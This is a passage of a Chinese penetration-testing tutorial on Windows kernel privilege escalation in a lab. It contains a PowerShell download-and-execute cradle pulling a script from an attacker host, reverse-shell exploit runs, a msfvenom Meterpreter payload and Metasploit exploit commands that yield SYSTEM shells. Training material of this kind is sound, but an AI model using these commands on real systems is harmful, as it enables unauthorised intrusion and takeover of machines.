<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">./windows-exploit-suggester.py --database 2021-04-16-mssb.xls --systeminfo win7.txt | grep &quot;\[M\]\|\[E\]&quot; | grep &quot;Elevation&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191846663-245145433-b9ed18b01143e12016574db1c211da3c.png" width="1024" height="236" class="img_ev3q"></p>
<p>最终，我们得到了一个可供测试的漏洞清单。</p>
<h6 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="222sherlockps1"><strong><div id="id2.2.2">2.2.2、Sherlock.ps1</div></strong><a href="#222sherlockps1" class="hash-link" aria-label="222sherlockps1的直接链接" title="222sherlockps1的直接链接">​</a></h6>
<p><a href="https://github.com/rasta-mouse/Sherlock" target="_blank" rel="noopener noreferrer">Sherlock</a> 是一个 PowerShell 脚本，可快速找到用于本地特权提升的漏洞利用。</p>
<p>Sherlock（夏洛克）已经被弃用大约 5 年了，并且也是从那时起就被Watson.exe（华生）所取代，Watson.exe 是一个用于枚举新版 Windows OS&#x27;（10/2016/2019）的工具，我们将在这篇文章的第二部分中看到它。</p>
<p>回到 Sherlock，我们可以利用 Sherlock 在旧版 Windows 系统上枚举内核漏洞。而当前正处在 Windows 7 机器上，因此这个工具对我们来说非常适合。</p>
<p>现在，在 Sherlock.ps1 脚本底部附加以下命令，以便脚本的枚举漏洞功能可以被自动执行：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &quot;Find-AllVulns&quot; &gt;&gt; Sherlock.ps1</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191842533-468020167-62d4e2197634e9df94ac9fd9e5f24659.png" width="796" height="239" class="img_ev3q"></p>
<p>Perfect！现在，我们可以将 sherlock.ps1 下载到受害者磁盘上，然后执行该脚本。或者可以开启 HTTP 服务器，然后将脚本直接下载到内存中进行执行。</p>
<p>我们使用后一种，先在攻击机开启 HTTP 服务器：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">python3 -m http.server 80</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p>然后在受害者机器上，执行以下 IEX 命令将脚本从攻击者计算机直接下载到内存中执行：</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">powershell.exe -c &quot;iex(new-object net.webclient).downloadstring(&#x27;http://172.16.1.30/Sherlock.ps1&#x27;)&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843778-1637579289-448de369c6916d90763022a7cc560989.png" width="995" height="843" class="img_ev3q"></p>
<p>Sherlock 会根据已安装的补丁程序，提取所有可能存在的漏洞。同时，它还会进一步告诉你系统是否容易受到该漏洞的攻击。</p>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="3使用内核利用"><strong><div id="id3">3、使用内核利用</div></strong><a href="#3使用内核利用" class="hash-link" aria-label="3使用内核利用的直接链接" title="3使用内核利用的直接链接">​</a></h2>
<p>现在，我们已经知道了该如何枚举内核漏洞利用，接下来就可以根据枚举出来的漏洞利用去该<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener noreferrer">仓库</a>查找可用的利用程序以进行测试。</p>
<blockquote>
<p>在<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener noreferrer">内核利用列表</a>中，你会发现大多数利用程序都会以 SYSTEM 的身份生成一个新的 cmd.exe 实例。虽然这很好，但只有我们在 GUI 图形化界面来查看 shell 的情况下才实用。但幸运的是，很多利用都支持“就地”提升或产生反向 shell，因此在实际测试这些利用时会同时展示这两种情况。</p>
</blockquote>
<p>现在，让我们通过图形化界面和反向 shell 测试一些漏洞，看看两者有什么不同。</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="31使用内核利用---gui"><strong><div id="id3.1">3.1、使用内核利用 - GUI</div></strong><a href="#31使用内核利用---gui" class="hash-link" aria-label="31使用内核利用---gui的直接链接" title="31使用内核利用---gui的直接链接">​</a></h4>
<p>假设我们在最初的枚举中找到了用户 bob 的凭据，同时发现 RDP 开放且bob 还是远程桌面用户组的一部分。然后，我们成功地通过 RDP 访问了该主机。</p>
<p>由于在<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener noreferrer">内核利用列表</a>上的大多数利用程序都会产生 cmd.exe 的新实例，因此当我们可以使用主机的图形化界面时，内核利用会非常简单。</p>
<p>【<strong>示例0</strong>】例如，从 Suggester 和 Sherlock 的输出来看，同时在两款工具中都出现的漏洞有 MS15-051 和 MS16-016。</p>
<p>因此，我们可以在内核利用列表中优先检查它俩是否被列出。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191842755-1731370308-8bca532c6241ddd7b3f26d62f62b577f.png" width="746" height="233" class="img_ev3q"></p>
<p>可以看到，两个漏洞都被列出了。现在，让我们只下载 MS15-051 然后将其发送给受害者。</p>
<blockquote>
<p>MS15-051 的预编译二进制文件被称为 Taihou32.exe，但在将其转移给受害者之前，我先将其重命名为 MS15-051.exe。</p>
</blockquote>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843108-41629079-512fc689aab9cfc9cb28ece20a7e21d9.png" width="691" height="357" class="img_ev3q"></p>
<p>现在，当运行可执行文件时，新的 shell 以 SYSTEM 身份产生了！</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843030-671475720-583524fb7802f8552c6d9d9f510a723e.png" width="717" height="578" class="img_ev3q"></p>
<p>就这么简单！</p>
<h4 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="32使用内核利用---reverse-shell"><strong><div id="id3.2">3.2、使用内核利用 - Reverse Shell</div></strong><a href="#32使用内核利用---reverse-shell" class="hash-link" aria-label="32使用内核利用---reverse-shell的直接链接" title="32使用内核利用---reverse-shell的直接链接">​</a></h4>
<p>上面我们只是看到了如何轻松地从 GUI 获得 SYSTEM shell，但通常我们是没有 GUI 访问权限的。</p>
<p>幸运的是，有不少漏洞利用程序可以通过反向 shell 运行，或“就地”提升至 SYSTEM。这意味着漏洞利用者可以在当前会话中直接升级到 SYSTEM，而无需再生成第二个 cmd 窗口。</p>
<p>【<strong>示例1</strong>】首先，让我们检查一下在 Sherlock 和 Suggester 上出现的第二个漏洞：MS16-016。</p>
<p>我们先获取此利用程序，然后将其传输到受害者机器上。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843334-508996609-8fcd3936068a8dc547f6d8fc639b44bf.png" width="632" height="263" class="img_ev3q"></p>
<blockquote>
<p>MS16-016 的预编译二进制文件被称为 eop.exe，但在将其转移给受害者之前，我先将其重命名为 MS16-016.exe。</p>
</blockquote>
<p>需要注意的是，MS16-016 二进制程序是需要 ShellCode.dll 文件才能工作。因此，我们要将两个文件转移到受害者机器。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843304-982399890-5b4b64b05b44e749094fa86ee63f8f08.png" width="446" height="247" class="img_ev3q"></p>
<p>现在，我们可以执行 MS16-016.exe。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843294-726291128-cd36598200cf93da72180db05041ea8c.png" width="568" height="362" class="img_ev3q"></p>
<p>Amazing！在当前的会话中，我们得到了一个 SYSTEM shell。</p>
<p>由于我们对这种内核漏洞利用（即“就地”提升）最感兴趣，所以让我们再看看另外两种内核漏洞利用，它们也可以被用来做同样的事情。</p>
<p>这次，我们将看到一个在 Sherlock 和 Suggester 扫描中均未出现的漏洞，它就是：MS11-046。</p>
<p>**既然该漏洞没有在任何一种工具的输出中出现，那为什么还要去尝试一下呢？**因为我们可以看到，当运行 wmic 命令时，已安装日期显示的是 2010年11月，也就是说这个补丁在2010年11月前就已经发布了，这也意味着任何等于或大于 MS11 的漏洞利用都值得我们去尝试。【注：根据补丁安装日期去判断漏洞的做法虽然不是很准确，但在无有效解法之前也是值得去尝试的。】</p>
<p>【<strong>示例2</strong>】因此，让我们测试它！</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843317-786070118-3ee84029ddef0d5964f5f5e03e31b767.png" width="437" height="260" class="img_ev3q"></p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843184-1056164686-a99c5be0c4db4ad1b269b8c533e6cfe9.png" width="320" height="190" class="img_ev3q"></p>
<p>BOOM！我们得到了另外一个 SYSTEM shell。</p>
<p>【<strong>示例3</strong>】接下来，我们开始另一个例子。可以看到，在 Suggester 的输出中显示 MS14-040.exe 可以被使用。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843303-834111629-673b21cba3c6bf314ed4f7c7e5dfb39d.png" width="438" height="274" class="img_ev3q"></p>
<p>当执行这个利用的时候，它会被挂起。当我们等待大约 20 秒，然后按两次回车键，就会得到 SYSTEM shell。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843982-353871000-db59a310eddcb294f60451cd0a3afecd.png" width="324" height="219" class="img_ev3q"></p>
<p>【<strong>示例4</strong>】最后一个例子在当前这台 win7 机器上不存在漏洞，但它也是一个很好的内核漏洞，那就是 MS10-059 或 &quot;Chimichurri&quot;。</p>
<p><strong>注：下面的示例是在 hackthebox 的盒子上进行的。</strong></p>
<p>将漏洞利用程序传输给受害者之后，我们可以尝试直接运行它以查看其命令用法：</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843183-1639697198-3638e2aab7a2d9eb75674419eca45ab4.png" width="973" height="87" class="img_ev3q"></p>
<p>这个利用程序会向攻击者的机器推送一个反向 shell，这与我们刚才看到的“就地”提升示例有些不同。这意味着我们需要在攻击者机器上启动一个 netcat 监听器。</p>
<div class="language-cmd codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-cmd codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">.\MS10-059.exe 10.10.14.6 9999</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843307-852807124-83d117f5c0186aeed39cae9223ff57e5.png" width="981" height="102" class="img_ev3q"></p>
<p>执行命令后会出现一条很令人高兴的提示信息。然后回到监听器后，我们收到了一个 SYSTEM shell！</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843709-348061030-764824d00547d6555cc1e66d7341a1a4.png" width="549" height="178" class="img_ev3q"></p>
<blockquote>
<p>我给你举了 4 个例子，但还有很多从反向 shell 运行的例子需要你自己去发现去测试🙂。提示：在<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener noreferrer">内核利用列表</a>中的漏洞利用程序有时候会附带工具使用截图，我们可以从截图中看出该漏洞利用是不是以反向 shell 的方式去使用的。</p>
</blockquote>
<h2 class="anchor anchorWithHideOnScrollNavbar_WYt5" id="4通过-metasploit-查找及使用内核利用"><strong><div id="id4">4、通过 Metasploit 查找及使用内核利用</div></strong><a href="#4通过-metasploit-查找及使用内核利用" class="hash-link" aria-label="4通过-metasploit-查找及使用内核利用的直接链接" title="4通过-metasploit-查找及使用内核利用的直接链接">​</a></h2>
<p>【<strong>示例5</strong>】Metasploit 是通过内核利用来提升权限的绝佳工具。</p>
<p>借助 Metasploit，我们可以使用其内置的本地漏洞利用建议模块（Local Exploit Suggester）来列举潜在可用的内核利用。之后，我们就可以在 Metasploit 中逐一去测试它们，因为它显示出来的漏洞利用都是在 Metasploit 中实际存在的模块。</p>
<p>要升级当前我们获得的立足点的 cmd shell 到 Meterpreter shel，我们可以快速生成一个有效载荷，然后将其转移给受害者，例如：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.30 LPORT=443 -a x86 --platform Windows -f exe -o meter86.exe</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191842931-343756380-8fb2f898d68d38f9fa03c922fe83d5ae.png" width="1024" height="157" class="img_ev3q"></p>
<p>接下来，我们需要在 Metasploit 中启动一个 multi-handler 监听器：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">msfconsole -q -x &quot;use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 172.16.1.30;set LPORT 443;exploit;&quot;</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843603-546478873-0dab115bcd241faa332eaaac79e2c20d.png" width="958" height="166" class="img_ev3q"></p>
<p>然后在受害者机器上执行该载荷。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843369-993192543-8db2723d5b7625382dd487593b042bb3.png" width="444" height="343" class="img_ev3q"></p>
<p>最后，回到 multi-handler 监听器，可以看到有一个 meterpreter shell 产生了。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843700-487385820-58fcda4211867b3bbe85d1b852af88a4.png" width="840" height="129" class="img_ev3q"></p>
<p>新产生的 meterpreter 的会话编号是 1，这很重要，我们需要记住这个编号。</p>
<p>从这里开始，我们需要使用以下命令来加载 Local Exploit Suggester 模块。</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">background</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">search suggester</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">use 0</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set SESSION 1</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">exploit</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843893-656489477-f2b761317480e6beb34602d27bd9ba8a.png" width="945" height="302" class="img_ev3q"></p>
<p>大约 30 秒后，Metasploit 会列出我们可以用来对付这台主机的潜在内核漏洞利用。</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843817-177682345-0153acd835563e9cb9facb83ab77d3d5.png" width="916" height="308" class="img_ev3q"></p>
<p>现在，我们需要逐一对这些漏洞进行测试，直到获得 SYSTEM shell 为止。在这里，我们跳过测试 UAC 绕过和 MS10-XXX 相关的模块，直接从 MS13-053 模块开始测试。【注：这里主要优先以内核漏洞利用为主，所以 UAC 相关模块直接跳过；因为那个补丁的原因，所以我们知道 MS10-XXX 模块在这台机器上大概率是无法使用的，故直接跳过。】</p>
<p>对于所有这些漏洞利用模块，我们都需要设置 LHOST、LPORT 和 SESSION 字段。LPORT 必须不同于前面获取 Meterpreter 会话时使用的 443 端口。</p>
<blockquote>
<p>Kitrap0d 是一个非常可靠的内核利用，但对于当前这台机器是无效的。</p>
</blockquote>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_biex"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">use exploit/windows/local/ms13_053_schlamperei</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set LHOST 172.16.1.30</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set LPORT 8080</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">set SESSION 1</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">exploit</span><br></span></code></pre><div class="buttonGroup__atx"><button type="button" aria-label="复制代码到剪贴板" title="复制" class="clean-btn"><span class="copyButtonIcons_eSgA" aria-hidden="true"><svg viewBox="0 0 24 24" class="copyButtonIcon_y97N"><path fill="currentColor" d="M19,21H8V7H19M19,5H8A2,2 0 0,0 6,7V21A2,2 0 0,0 8,23H19A2,2 0 0,0 21,21V7A2,2 0 0,0 19,5M16,1H4A2,2 0 0,0 2,3V17H4V3H16V1Z"></path></svg><svg viewBox="0 0 24 24" class="copyButtonSuccessIcon_LjdS"><path fill="currentColor" d="M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"></path></svg></span></button></div></div></div>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843879-132742142-cb3c4fda349093a8e94a69b5600c54c9.png" width="857" height="319" class="img_ev3q"></p>
<p>经过几次不断的尝试，我们最终成功获得了 SYSTEM shell！</p>
<p><img decoding="async" loading="lazy" src="/web/assets/images/1503193-20250311191843595-1953975783-2ada41fa984a6c805ba3fee6e06c8516.png" width="849" height="222" class="img_ev3q"></p>
<blockquote>
<p>对于 Suggester 为我们找到的大多数内核漏洞，只要它显示“The target appears to be vulnerable”，那就很有可能会被成功提升到 SYSTEM。</p>
</blockquote></div></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="文件选项卡"><a class="pagination-nav__link pagination-nav__link--prev" href="/web/docs/渗透/Windows 提权/Windows 提权-不安全的 GUI 程序"><div class="pagination-nav__sublabel">上一页</div><div class="pagination-nav__label">Windows 提权-不安全的 GUI 程序</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/web/docs/渗透/Windows 提权/Windows 提权-内核利用_2"><div class="pagination-nav__sublabel">下一页</div><div class="pagination-nav__label">Windows 提权-内核利用_2</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#导航" class="table-of-contents__link toc-highlight">导航</a></li><li><a href="#0前言" class="table-of-contents__link toc-highlight"><strong><div>0、前言</div></strong></a></li><li><a href="#1旧版-windows-系统内核利用" class="table-of-contents__link toc-highlight"><strong><div>1、旧版 Windows 系统内核利用</div></strong></a></li><li><a href="#2搜寻内核漏洞" class="table-of-contents__link toc-highlight"><strong><div>2、搜寻内核漏洞</div></strong></a></li><li><a href="#3使用内核利用" class="table-of-contents__link toc-highlight"><strong><div>3、使用内核利用</div></strong></a></li><li><a href="#4通过-metasploit-查找及使用内核利用" class="table-of-contents__link toc-highlight"><strong><div>4、通过 Metasploit 查找及使用内核利用</div></strong></a></li></ul></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="margin-bottom--sm"><a href="https://www.cnblogs.com/kqdssheng" rel="noopener noreferrer" class="footerLogoLink_BH7S"><img src="/web/img/logo.svg" alt="博客园" class="footer__logo themedComponent_mlkZ themedComponent--light_NVdE" width="30" height="30"><img src="/web/img/logo.svg" alt="博客园" class="footer__logo themedComponent_mlkZ themedComponent--dark_xIcU" width="30" height="30"></a></div></div></div></footer></div>
</body>
</html>